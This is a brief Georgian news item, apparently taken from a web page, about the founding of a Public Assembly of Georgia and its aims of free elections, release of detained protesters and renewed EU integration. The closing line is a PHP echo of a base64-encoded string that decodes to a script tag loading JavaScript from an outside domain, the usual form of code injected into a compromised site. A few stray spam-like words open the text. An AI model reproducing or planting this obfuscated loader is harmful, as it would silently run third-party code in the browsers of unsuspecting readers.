tube
ავერსი jaluzi

დღეს საქართველოს საზოგადოებრივი ასამბლეა დაფუძნდება. გადაწყვეტილების მისაღებად, 18:00 საათზე საინიციატივო გუნდი "რედისონ ბლუ ივერიაში" იკრიბება, რომელიც სხვადასხვა სფეროსა და ჯგუფის 50-მდე წარმომადგენელს გააერთიანებს.

გავრცელებული ინფორმაციით, აღნიშნული გუნდის საქართველოში არსებული ღრმა პოლიტიკური კრიზისის საპასუხოდ შეიკრიბება და ასამბლეა 1917 წლის ეროვნული ყრილობის ისტორიულ მემკვიდრეობას გააგრძელებს.

საქართველოს საზოგადოებრივი ასამბლეა მიზნად ისახავს ხელი შეუწყოს:

● სამართლიანი და თავისუფალი არჩევნების ჩატარებას;
● მშვიდობიანი პროტესტების წინააღმდეგ ძალადობის შეწყვეტასა და საპროტესტო აქციების
დროს უსამართლოდ დაკავებულების განთავისუფლებას;
● ევროინტეგრაციის გზაზე დაუყონებლივ დაბრუნებასა და მედეგი დემოკრატიული სისტემის
განვითარების ხელშეწყობას, რაც მომავალშიც გამორიცხავს ძალაუფლების მიტაცებას;

როგორც ცნობილია, ამ მიზნების მისაღწევად საზოგადოებრივ ასამბლეას გააჩნია მოქმედი მექანიზმი - მოქალაქეებს შესაბამის სამუშაო ჯგუფებში გაერთიანებით შეეძლებათ მნიშვნელოვანი საკითხების დამუშავება, განხილვა და თავიანთი ძალისხმევით საზოგადოებრივი ზეწოლის გაძლიერება.

84
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");